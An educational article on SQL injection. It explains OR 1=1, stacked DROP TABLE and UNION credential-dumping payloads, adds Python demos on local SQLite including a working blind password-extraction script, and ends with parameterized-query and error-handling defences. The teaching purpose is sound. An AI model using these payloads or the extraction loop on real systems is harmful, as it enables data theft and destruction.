What is SQL Injection: How It Works, Examples, and Types

Data is one of the most important assets of an information system. Organizations use database-backed web applications to collect and store data from their customers. SQL (Structured Query Language) is the language those applications use to retrieve and manipulate data in the database. Because user input so often ends up inside SQL statements, attackers have a well-established way to abuse it: SQL injection.

You may not know what SQL injection (SQLi) is or how it works, but you have probably heard of its victims. Target, Yahoo, Zappos, Equifax, Epic Games, TalkTalk, LinkedIn and Sony Pictures all appear in popular lists of companies breached through SQL injection. For several of them (Yahoo, LinkedIn, Sony Pictures, TalkTalk, Epic Games) the attackers' own claims or later investigations did point at SQL injection; others on such lists were primarily attributed to different causes (the Equifax breach, for example, to an unpatched web framework vulnerability), so treat the list as illustrative rather than authoritative.

SQL injection has become a common problem for websites that rely on databases. The flaw is easy to spot and easy to exploit, which is why it remains so widespread.

Read also: What is an XSS (Cross-Site Scripting) attack?

What is SQL injection

SQL injection (SQLi) is an attack in which cybercriminals exploit a flaw in the way a web application builds its database queries. It lets attackers read data they would not normally be able to retrieve, including data belonging to other users and anything else the application itself can access. In many cases an attacker can also modify or delete that data, causing persistent changes to the application's content or behaviour.

In some cases an attacker can escalate a SQL injection attack to compromise the underlying database server or other back-end infrastructure, or use it to perform a denial-of-service attack.

Read also: What is a DDOS attack and how to avoid it

How does SQL injection work?

SQL injection is a major concern when developing web applications. It happens when an application takes user input and builds it into an SQL statement that it sends to the back-end database, so that the input is interpreted as SQL syntax rather than as plain data.

An attacker can supply SQL control characters and keywords (single quotes ('), double quotes ("), equals signs (=), comment markers (--), semicolons (;), and so on) to change the structure of the query. Combined with ordinary SQL commands (SELECT, FROM, UNION, DELETE, DROP, etc.), these characters let the attacker read or change data held by the back-end database server.

A successful attack requires the application to include the attacker's text in an SQL statement unchanged. The malicious input usually arrives directly from an untrusted source such as a form field, URL parameter, cookie or HTTP header. It can also come from inside the system: data that was stored safely earlier (for example a username containing a quote character) and is later concatenated into a second query, which is known as second-order SQL injection. What the attacker can achieve once the statement runs depends on where in the query the input lands and on the privileges of the database account the application uses.

SQL injection example

Attackers performing SQL injection tamper with the application's ordinary SQL queries so that the database grants them access it was never meant to. There are many ways to carry out the attack; the examples below use a hypothetical online store at http://www.eniaga.com.

For example, a product page requested as http://www.eniaga.com/items/items.asp?itemid=999 pulls the information for one specific product. The attacker changes the URL to http://www.eniaga.com/items/items.asp?itemid=999 or 1=1.

As a result, the related SQL query looks like this:

SELECT ItemName, ItemDescription 
FROM Items 
WHERE ItemNumber = 999 OR 1=1

Since 1=1 is always true, the WHERE clause matches every row, and the query returns the names and descriptions of all products in the table, including those the user should not be able to see.

Attackers can also take advantage of improperly filtered characters to append a second command, using a semicolon to separate two statements (a so-called stacked query).

For example, requesting http://www.eniaga.com/items/items.asp?itemid=999; DROP TABLE Users causes the application to run the following SQL:

SELECT ItemName, ItemDescription 
FROM Items 
WHERE ItemNumber = 999; DROP TABLE Users

If the database and client library allow more than one statement per request (SQL Server does by default, whereas the MySQL client protocol requires the application to enable multi-statement support explicitly), the entire Users table is dropped.

Another way to manipulate SQL queries is a UNION SELECT statement, which combines the results of two unrelated SELECT queries so that data from a different table is appended to the results the application already displays.

For example, requesting http://www.eniaga.com/items/items.asp?itemid=999 UNION SELECT Username, Password FROM Users leads to the following SQL query:

SELECT ItemName, ItemDescription 
FROM Items 
WHERE ItemNumber = 999 UNION SELECT Username, Password FROM Users;

Using UNION SELECT, this query combines the request for item 999's name and description with a second query that pulls the username and password of every user in the database. For a UNION to work, both SELECTs must return the same number of columns with compatible types, which is why attackers usually probe the column count first (for example with ORDER BY n or UNION SELECT NULL, NULL, ...).
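The following Python script, added here as an illustration and not code from the original article, reproduces the mechanism described under "How does SQL injection work?" and the three payloads above against an in-memory SQLite database. The table contents, the function names vulnerable_lookup, safe_lookup and stacked_query_attempt, and the use of the sqlite3 driver are all assumptions of the example; the original page only shows the resulting SQL.

```python
import sqlite3


def build_db():
    """Constructed sample data standing in for the article's Items and Users tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Items (ItemNumber INTEGER PRIMARY KEY,
                            ItemName TEXT, ItemDescription TEXT);
        CREATE TABLE Users (Username TEXT, Password TEXT);
        INSERT INTO Items VALUES (999,  'Widget', 'Public product');
        INSERT INTO Items VALUES (1000, 'Gadget', 'Unreleased product');
        INSERT INTO Items VALUES (1001, 'Gizmo',  'Internal SKU');
        INSERT INTO Users VALUES ('admin', 's3cret');
        INSERT INTO Users VALUES ('alice', 'hunter2');
    """)
    return conn


def vulnerable_lookup(conn, item_id):
    """The flaw: the itemid parameter is pasted into the SQL text, so any SQL
    syntax it contains changes the structure of the query."""
    sql = ("SELECT ItemName, ItemDescription FROM Items "
           "WHERE ItemNumber = " + item_id)
    return conn.execute(sql).fetchall()


def safe_lookup(conn, item_id):
    """The fix: a parameterized query. The value travels separately from the
    SQL text, so '999 OR 1=1' is compared as one (non-matching) value."""
    sql = ("SELECT ItemName, ItemDescription FROM Items "
           "WHERE ItemNumber = ?")
    return conn.execute(sql, (item_id,)).fetchall()


def users_table_exists(conn):
    row = conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name = 'Users'"
    ).fetchone()
    return row is not None


def stacked_query_attempt(conn, item_id):
    """Send the article's '999; DROP TABLE Users' payload through the
    vulnerable function and report whether Users survived. Python's sqlite3
    driver refuses a second statement per execute(), so here it survives;
    on a stack that allows stacked queries the table would be gone."""
    try:
        vulnerable_lookup(conn, item_id)
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        pass  # "You can only execute one statement at a time."
    return users_table_exists(conn)


if __name__ == "__main__":
    db = build_db()
    print("normal:        ", vulnerable_lookup(db, "999"))
    print("OR 1=1:        ", vulnerable_lookup(db, "999 OR 1=1"))
    print("UNION:         ", vulnerable_lookup(
        db, "999 UNION SELECT Username, Password FROM Users"))
    print("parameterized: ", safe_lookup(db, "999 OR 1=1"))
    print("Users survives:", stacked_query_attempt(db, "999; DROP TABLE Users"))
```

The OR 1=1 payload returns all three products, the UNION payload appends every username and password to the product list, and the parameterized version returns nothing for the same input because the whole string is compared as a single value. Whether the stacked DROP TABLE payload runs is a property of the driver and database, not of the application code, so do not rely on it being blocked.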

Types of SQL injection

SQL injections can be classified into three main categories:

  • In-band SQL injection
  • Inferential (blind) SQL injection
  • Out-of-band SQL injection

1. In-band SQLi (Classic SQLi)

In-band SQL injection is the most common and most easily exploited kind of SQL injection attack. It occurs when an attacker can use the same communication channel both to launch the attack and to collect its results. For example, an attacker sends the payload in an HTTP request and reads the extracted data out of the HTTP response to that same request.

There are two main types of in-band SQL injection:

  1. Error-based SQLi: an in-band technique that relies on error messages returned by the database server to obtain information about the database structure. In some cases error-based SQLi alone is enough for an attacker to enumerate the entire database, which is why detailed database errors should never reach the client.
  2. Union-based SQLi: an in-band technique that uses the SQL UNION operator to combine the results of two or more SELECT statements into a single result set, which is then returned to the attacker as part of the HTTP response.

2. Inferential SQLi (Blind SQLi)

Inferential SQL injection, unlike in-band SQLi, may take longer for an attacker to exploit, but it is just as dangerous as the other forms. In an inferential attack no data is actually returned through the web application, so the attacker cannot see the results the way they would in an in-band attack (which is why these attacks are often called "blind SQL injection").

Instead, the attacker reconstructs the database contents by sending payloads and observing how the web application responds and how the database server behaves. There are two types of inferential SQL injection: Boolean-based blind SQLi and time-based blind SQLi.

  1. Boolean-based (content-based) blind SQLi: an inferential technique that sends queries forcing the application to return different results depending on whether an injected condition evaluates to TRUE or FALSE. Depending on the result, the content of the HTTP response changes or stays the same. This lets the attacker infer whether the condition was true or false, even though no query data is returned, and by chaining such true/false questions (for example comparing one character of a secret at a time) the attacker recovers the data bit by bit.
  2. Time-based blind SQLi: an inferential technique that sends queries forcing the database to wait a certain number of seconds before responding, but only when an injected condition is true. Depending on the result, the HTTP response is delayed or returned immediately, so the response time tells the attacker whether the condition was true or false, again without any query data being returned. It is used when the page content does not change at all, at the cost of being slower and sensitive to network jitter.
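As an added example (not part of the original article), the script below carries out the Boolean-based blind extraction just described against a simulated vulnerable product page backed by SQLite. The endpoint page_has_item, the BlindOracle class, the table contents and the secret 'Tr0ub4dor&3' are all constructed for the demonstration. The attacker never sees query output; every probe returns only whether the product page rendered.

```python
import sqlite3

PRINTABLE_MIN, PRINTABLE_MAX = 32, 126   # code-point range searched per character
MAX_LEN = 64                              # give up past this length


def build_db():
    """Constructed sample data: the product the page shows, and the secret the
    attacker wants. The password is stored in clear only to keep the demo short."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Items (ItemNumber INTEGER, ItemName TEXT);
        CREATE TABLE Users (Username TEXT, Password TEXT);
        INSERT INTO Items VALUES (999, 'Widget');
        INSERT INTO Users VALUES ('admin', 'Tr0ub4dor&3');
    """)
    return conn


def page_has_item(conn, item_id):
    """Simulated vulnerable endpoint (hypothetical): itemid is concatenated into
    the query, and the only thing the caller learns is whether a product row
    came back (page shows a product) or not (page shows 'not found')."""
    sql = "SELECT ItemName FROM Items WHERE ItemNumber = " + item_id
    return conn.execute(sql).fetchone() is not None


class BlindOracle:
    """Attacker-side wrapper: each probe injects 'AND (<condition>)' after a
    known-good id, so the page changes only when the condition is false."""

    def __init__(self, conn):
        self.conn = conn
        self.probes = 0

    def ask(self, condition):
        self.probes += 1
        return page_has_item(self.conn, "999 AND (" + condition + ")")


def extract_password(oracle, username):
    """Recover Users.Password for `username` without ever seeing query output:
    first the length, then each character by binary search on its code point
    (at most 7 probes per character for the printable ASCII range)."""
    secret = "(SELECT Password FROM Users WHERE Username = '{}')".format(username)

    # Step 1: how long is the secret?  LENGTH(...) > n for n = 0, 1, 2, ...
    length = 0
    while length < MAX_LEN and oracle.ask("LENGTH({}) > {}".format(secret, length)):
        length += 1

    # Step 2: binary-search the code point of each character.
    recovered = ""
    for pos in range(1, length + 1):
        lo, hi = PRINTABLE_MIN, PRINTABLE_MAX
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle.ask("UNICODE(SUBSTR({}, {}, 1)) > {}".format(secret, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    oracle = BlindOracle(build_db())
    print(extract_password(oracle, "admin"), "in", oracle.probes, "probes")
```

An 11-character password comes back in under 90 page requests, which is why blind injection is slow but still entirely practical. The time-based variant uses the same loop; the only change is that the injected condition becomes something like CASE WHEN (condition) THEN SLEEP(3) ELSE 0 END on MySQL (pg_sleep on PostgreSQL, WAITFOR DELAY on SQL Server) and the oracle measures elapsed time instead of reading the page. SQLite has no sleep function, so that variant is not shown here.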

3. Out-of-band SQLi

Out-of-band SQL injection is not common, largely because it depends on features being enabled on the database server the web application uses, such as the ability to make DNS or HTTP requests from inside a query. An out-of-band attack occurs when the attacker cannot use the same channel to launch the attack and collect the results, and instead has the database server send the data to a host the attacker controls. Out-of-band techniques give attackers an alternative to time-based inference, especially when the server's response time is unstable (which makes time-based blind attacks unreliable).

How to prevent SQL injection attacks?

Use the following tips to help prevent SQL injection attacks on your web applications.

  • Use parameterized queries (prepared statements): Never build SQL by concatenating user input into the query string. Pass every user-supplied value as a bound parameter so the database receives it as data, not as part of the statement. This is the one measure that actually removes the vulnerability; the remaining tips limit the damage when it is present anyway. Note that parameters only cover values: table and column names (for example a user-selectable sort column) cannot be bound and must be checked against an allowlist.
  • Restrict application privileges: Give the database account the application connects with only the rights it needs to function. Every successful SQL injection runs with the privileges of that account, so an account that cannot DROP tables or read other schemas turns a full compromise into a much smaller one. Restricting privileges does not prevent SQL injection, but it limits what an attacker can do with it.
  • Strong SA password policy: Attackers often need sysadmin privileges for certain SQL commands, and on SQL Server that means the SA (sysadmin) account. A weak SA password is much easier to brute-force and increases the chances that an injection can be escalated. Better still, do not let the application use the SA account at all; create a dedicated account intended for that specific application.
  • Consistent error handling: Give the user as little information as possible when a database error occurs, and never return the raw error message; detailed errors are exactly what error-based SQLi feeds on. Handle errors on the web and application servers: when the web server encounters a processing error it should respond with a generic error page or redirect the user to a standard page, and the full details belong in the server log, not in the response. Do not expose debug information or other details that could help an attacker. Application servers such as WebSphere are often installed with verbose error messages or debug settings enabled by default; consult the application server documentation for how to hide them.
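The prevention tips above are illustrated by the following Python snippet, added here and not taken from the original article. It assumes a hypothetical search handler (search_items, handle_request) over SQLite and shows the points the list only states: the search value goes through a bound parameter, the ORDER BY column cannot be bound and so goes through an allowlist, and database errors are logged in full on the server but returned to the client as one fixed generic message.

```python
import logging
import sqlite3

log = logging.getLogger("shop")

# Identifiers (column names) cannot be bound as parameters, so the only safe
# way to let the client choose a sort order is an allowlist of known names.
ALLOWED_SORT_COLUMNS = {"ItemName", "ItemNumber"}


def build_db():
    """Constructed sample catalogue."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Items (ItemNumber INTEGER PRIMARY KEY, ItemName TEXT);
        INSERT INTO Items VALUES (999, 'Widget');
        INSERT INTO Items VALUES (1000, 'Gadget');
    """)
    return conn


def search_items(conn, keyword, sort_by="ItemName"):
    """Search by keyword (bound as a value) and sort by an allowlisted column."""
    if sort_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError("unsupported sort column")
    # sort_by is safe to concatenate only because it was just allowlisted.
    sql = ("SELECT ItemNumber, ItemName FROM Items "
           "WHERE ItemName LIKE ? ORDER BY " + sort_by)
    return conn.execute(sql, ("%" + keyword + "%",)).fetchall()


def handle_request(conn, params):
    """Hypothetical request handler returning (status, body). Database errors
    are logged in full server-side; the client only ever sees a generic
    message, so a failed injection attempt reveals nothing about the schema."""
    try:
        rows = search_items(conn, params.get("q", ""),
                            params.get("sort", "ItemName"))
        return 200, {"items": rows}
    except ValueError:
        return 400, {"error": "invalid request"}
    except sqlite3.Error as exc:
        log.error("database error for params %r: %s", params, exc)
        return 500, {"error": "internal error"}


if __name__ == "__main__":
    db = build_db()
    print(handle_request(db, {"q": "", "sort": "ItemNumber"}))
    print(handle_request(db, {"q": "", "sort": "ItemName; DROP TABLE Items"}))
    print(handle_request(db, {"q": "' OR 1=1 --"}))
```

The payload in the last call is harmless because it is bound as the LIKE pattern rather than parsed as SQL, and the attempt to smuggle a statement through the sort parameter is rejected before any SQL is built. One thing a bound LIKE parameter does not stop is wildcard abuse: a keyword containing % or _ still acts as a wildcard, so escape those characters (with an ESCAPE clause) if that matters for your data.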

Conclusion

So what is SQL injection? Simply put, SQL injection is an attack on a web application, not on the web server or the operating system itself. As the name implies, it is the process of adding unexpected SQL commands to a query, thereby manipulating the database in a way the database administrator or developer never intended. If successful, data can be extracted from, modified in, inserted into or deleted from the database server used by the compromised web application, and under some circumstances SQL injection can be escalated to full control of the system.
